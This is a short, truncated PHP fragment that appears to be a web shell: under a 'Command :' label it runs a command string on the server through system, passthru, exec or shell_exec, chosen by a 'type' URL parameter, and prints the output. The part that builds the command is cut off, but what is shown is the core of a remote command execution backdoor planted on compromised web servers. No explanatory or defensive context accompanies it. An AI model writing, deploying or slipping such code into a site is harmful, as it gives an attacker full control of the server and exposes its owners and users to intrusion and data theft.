Command :

&1";
	if (!$_GET['type']) {
		system($cmd);
	} elseif ($_GET['type']==1) {
		passthru($cmd);
	} elseif ($_GET['type']==2) {
		echo (exec($cmd));
	} elseif ($_GET['type']==3) {
		$output = shell_exec($cmd);
		echo $output;
	} 
?>